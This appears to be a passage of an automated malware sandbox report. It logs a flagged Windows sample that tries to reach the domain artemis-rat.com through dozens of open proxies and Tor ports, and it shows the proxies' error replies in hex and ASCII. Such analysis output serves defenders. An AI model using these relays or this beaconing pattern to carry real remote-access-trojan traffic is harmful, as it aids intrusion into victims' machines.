                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:33.663219929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              998192.168.2.453146162.159.242.109807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.486284018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.647499084 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              999192.168.2.45311447.243.114.19281807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.487021923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1000192.168.2.453226104.16.224.33807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.487225056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.641309023 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1001192.168.2.45308265.21.255.19731287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.487416983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.811006069 CET75INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Length: 0
                                              Mar 11, 2024 08:37:22.136208057 CET103INHTTP/1.1 400 Bad Request
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                              Data Ascii: 400 Bad Request


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1002192.168.2.453216162.159.242.150807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.488802910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.649765968 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1003192.168.2.453250104.16.108.149807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.488806009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.643157959 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1004192.168.2.45089037.18.73.6055667284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.489917994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.770080090 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1005192.168.2.453072109.69.0.17956787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.489959002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1006192.168.2.450972148.72.215.230443877284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.490087986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.554035902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.645504951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.648791075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.682895899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1007192.168.2.453278104.18.237.128807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.490464926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.644689083 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1008192.168.2.453095120.24.176.79807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.490467072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.825721979 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1009192.168.2.45326834.102.179.21807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.490753889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.762092113 CET462INHTTP/1.1 405 Method Not Allowed
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 317
                                              Connection: close
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 68 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 6d 65 74 68 6f 64 20 3c 63 6f 64 65 3e 43 4f 4e 4e 45 43 54 3c 2f 63 6f 64 65 3e 20 69 73 20 69 6e 61 70 70 72 6f 70 72 69 61 74 65 20 66 6f 72 20 74 68 65 20 55 52 4c 20 3c 63 6f 64 65 3e 2f 3c 2f 63 6f 64 65 3e 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>405 Method Not Allowed</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Method Not Allowed</h1><h2>The request method <code>CONNECT</code> is inappropriate for the URL <code>/</code>.</h2><h2></h2></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1010192.168.2.453153163.172.147.9163797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.492773056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.273627996 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1011192.168.2.453079202.162.219.1010807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.493232965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1012192.168.2.451637162.253.68.9741457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.495242119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1013192.168.2.453048218.57.210.18690027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.496165991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.367491007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
